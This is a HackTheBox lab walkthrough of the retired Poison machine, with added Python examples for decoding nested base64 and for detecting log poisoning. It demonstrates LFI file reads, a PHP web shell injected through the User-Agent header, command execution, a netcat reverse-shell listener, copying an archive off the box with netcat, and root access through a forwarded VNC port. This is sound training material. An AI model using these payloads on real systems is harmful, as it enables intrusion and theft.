Poison HackTheBox WalkThrough
This is the Poison HackTheBox machine walkthrough and also the 20th machine of our OSCP-like HTB boxes series. In this writeup I have demonstrated step by step how I rooted the Poison HTB machine in two different ways. Before starting, let us know something about this machine. It is a FreeBSD box with IP address 10.10.10.84 and difficulty medium, as assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Poison machine by pinging IP 10.10.10.84. If all goes well, start hacking. As usual I started by scanning the machine. I used Nmap [a port scanner] for this task and the result is below.
Scanning
$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84
$ cat nmap/Poison.nmap
Nmap found ports 22 and 80 open: OpenSSH is running on port 22 and the Apache2 web server on port 80. Enumeration on port 22 is of little use here because OpenSSH 7.2 has few vulnerabilities that could give us information to help further enumeration, so I began my enumeration from port 80, which also has a far larger attack surface than port 22. On going to the URL http://10.10.10.84/ I found a website made entirely from HTML and PHP.
There are many PHP scripts listed. After entering listfiles.php into the Scriptname field and submitting, I found an array containing a large number of files. This array also contains a file pwdbackup.txt.
When I accessed this file using the URL view-source:http://10.10.10.84/browse.php?file=pwdbackup.txt, it contained some base64-encoded characters along with a message that it is encoded at least 13 times. When I decoded it I got a password. To decode it, first copy the whole encoded password into a file and then decode it 13 times.
$ nano encoded-passwd    # paste the whole encoded password into this file
$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d    # 13 rounds of decoding
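The same 13-layer decode, generalized: an added Python example (not from the original walkthrough) that keeps peeling base64 layers until the output stops looking like base64, so you do not have to count pipes. It runs on a constructed placeholder secret, not the box's real pwdbackup.txt.

```python
import base64
import binascii
import re
from typing import Tuple

# Strict base64 alphabet check. A decoded layer that is still base64 text
# (ignoring whitespace) is treated as another layer to peel off.
_B64_RE = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def peel_base64(blob: bytes, max_layers: int = 32) -> Tuple[bytes, int]:
    """Decode nested base64 until the result stops looking like base64.

    Returns (final_bytes, layers_removed). Whitespace is stripped before each
    attempt because the base64 tool wraps its output at 76 columns, and
    `base64 -d` tolerates that. Caveat: a plaintext that happens to be valid
    base64 (e.g. "abcd") would be decoded one layer too far.
    """
    data = blob
    layers = 0
    while layers < max_layers:
        candidate = b"".join(data.split())
        if not candidate or len(candidate) % 4 or not _B64_RE.match(candidate):
            break
        try:
            data = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break
        layers += 1
    return data, layers


def encode_layers(secret: bytes, layers: int) -> bytes:
    """Constructed helper: wrap `secret` in `layers` rounds of base64."""
    data = secret
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


if __name__ == "__main__":
    # Constructed sample: a placeholder secret wrapped 13 times, mimicking the
    # "encoded at least 13 times" note in pwdbackup.txt (not the real value).
    sample = encode_layers(b"not-the-real-password", 13)
    plain, n = peel_base64(sample)
    print(f"removed {n} layers -> {plain.decode()}")
```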
After decoding I got the password Charix!2#4%6&8(0. I didn't know whose password it was; we would try it to log in via SSH once we got a username. After some enumeration I found an LFI vulnerability at the URL http://10.10.10.84/browse.php?file=/etc/passwd. For a clearer view check its source code, as given in the screenshot. The passwd file revealed two users, root and charix, that have a shell. When I tried to SSH into the charix account using the decoded credential I could log in easily. So here our credential is charix : Charix!2#4%6&8(0.
Let us SSH into charix's account.
Getting User Shell via SSH ~ Method 1
$ ssh charix@10.10.10.84
~Charix!2#4%6&8(0        # entered at the password prompt
% whoami && id
We have successfully got a user shell. Let us capture the user flag.
Capture User Flag
% cat user.txt
Getting User Shell via Log Poisoning ~ Method 2
We have successfully got the user flag. I am also going to get a shell another way, and that one is probably the intended way: Log Poisoning, which I think is the reason the box is named Poison. Before going further we should know what log poisoning is. When an attacker finds an LFI vulnerability he tries to upgrade it to RCE so that the attack has more impact. There are multiple techniques to get RCE from LFI, and log poisoning is one of them. In log poisoning an attacker injects malicious input into the server log and then accesses the log file via the LFI vulnerability.
Since the log file records the User-Agent header, and among the logged fields the User-Agent is one the attacker controls, he replaces the User-Agent with his own PHP code, as shown in the request below (this request is to http://10.10.10.84). After sending the request, when he checks the log file he will find the output of that code in it. For more info on LFI to RCE check this link.
We can access the log file of the Poison web server at the URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see, our PHP code is executed and hello is printed in the log.
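From the defender's side, the two halves of this technique both leave traces in httpd-access.log: a User-Agent carrying a PHP tag, and a request that includes the log file itself through the vulnerable file= parameter. The following added Python example (not part of the original walkthrough) scans Apache combined-format lines for both; the sample lines are constructed, not a capture from the box.

```python
import re
from typing import Dict, List

# Apache "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A User-Agent that has been replaced with server-side code.
_PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# The log itself being pulled in through the browse.php file= parameter.
_LOG_INCLUDE = re.compile(r"[?&]file=[^& ]*(?:/var/log/|httpd-access\.log)")


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious line, with the reason and source IP."""
    findings = []
    for line in lines:
        m = _COMBINED.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, req, ua = m.group("ip"), m.group("request"), m.group("ua")
        if _PHP_TAG.search(ua):
            findings.append({"ip": ip, "reason": "php tag in User-Agent", "ua": ua})
        elif _LOG_INCLUDE.search(req):
            findings.append({"ip": ip, "reason": "log file requested via file=", "request": req})
    return findings


# Constructed sample lines (not a real capture from the box).
SAMPLE_LOG = [
    '10.10.14.16 - - [21/Mar/2020:10:00:01 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.16 - - [21/Mar/2020:10:00:05 +0100] "GET / HTTP/1.1" 200 512 "-" "<?php echo \'hello\'; ?>"',
    '10.10.14.16 - - [21/Mar/2020:10:00:09 +0100] "GET /browse.php?file=/var/log/httpd-access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.68.0"',
    '10.10.14.17 - - [21/Mar/2020:10:01:00 +0100] "GET /browse.php?file=ini.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```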
Now let us include a cmd variable in our PHP code through which we can execute an OS command to get a reverse shell. Replace the User-Agent with the following PHP code
<?php system($_GET['cmd']) ?>
and forward the request from the Repeater.
Confirming RCE
We can access the URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in the browser to execute an OS command. Simply replace id with the required OS command and you will get its result at the bottom of the page. We can confirm this by the result of the id command at the bottom.
We have successfully confirmed RCE via log poisoning. To get a reverse shell, start a netcat listener on your Kali machine in one window and execute the following URL either in a web browser or through the curl command as shown below.
Getting Reverse Shell
$ nc -nvlp 1234
$ whoami && id
We have successfully got a user shell. So this was the intended way to get into the box. Now exit this shell and log in via SSH using the credentials charix : Charix!2#4%6&8(0 to work on privilege escalation.
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector.
Finding PrivEsc Vector
During some initial enumeration I found a secret.zip file inside charix's home directory. I copied this file to my Kali machine so that I could unzip it and analyse its contents. When I tried to extract it, it asked for a password; I entered Charix!2#4%6&8(0 and it extracted successfully. After extraction I got a file named secret. It is an extended-ASCII file. On checking its content with cat it shows some unreadable characters. I didn't know exactly what the use of this file was. We will check this file later and see where we need it.
Copying File locally to Kali Machine
% cat secret.zip | nc 10.10.14.16 1234        # On Poison machine: send the archive to Kali
$ nc -l -p 1234 > secret.zip < /dev/null       # On Kali machine: receive it
$ unzip secret.zip
~Charix!2#4%6&8(0                              # entered at the archive password prompt
On checking the LISTENING ports on the Poison machine I found ports 5801 and 5901 listening locally. After some googling I found that 5801 and 5901 are VNC ports, used for remote desktop access.
% netstat -an | grep "LISTEN"
Then I confirmed that an Xvnc process is running using the ps command. Xvnc is a VNC server, and this one is running with root privileges. So our potential PrivEsc vector here is VNC.
% ps -aux | grep vnc
Since VNC connects to a GUI desktop, it is not possible to get the VNC session through the terminal directly. We have to local-port-forward port 5901 to our Kali machine to use the VNC session.
Local Port Forwarding
$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84    # To perform Local Port Forwarding
~Charix!2#4%6&8(0                                    # entered at the password prompt
$ ss -lnpt                                           # Check listening ports on your Kali machine
When I connected with vncviewer using the secret file as the password file to port 5901, it opened a VNC desktop, as you can see in the screenshot, and that too with root user access. So we have successfully escalated privileges to root. Let us capture the root flag.
$ vncviewer -passwd secret 127.0.0.1:5901
Capture root Flag
# whoami
# hostname
# id
# ls
# cat root.txt
This was how I rooted the Poison HackTheBox machine. I hope you have learnt something new from this machine walkthrough. Thanks for reading this article. For any query or suggestion related to the walkthrough feel free to write to us at [email protected].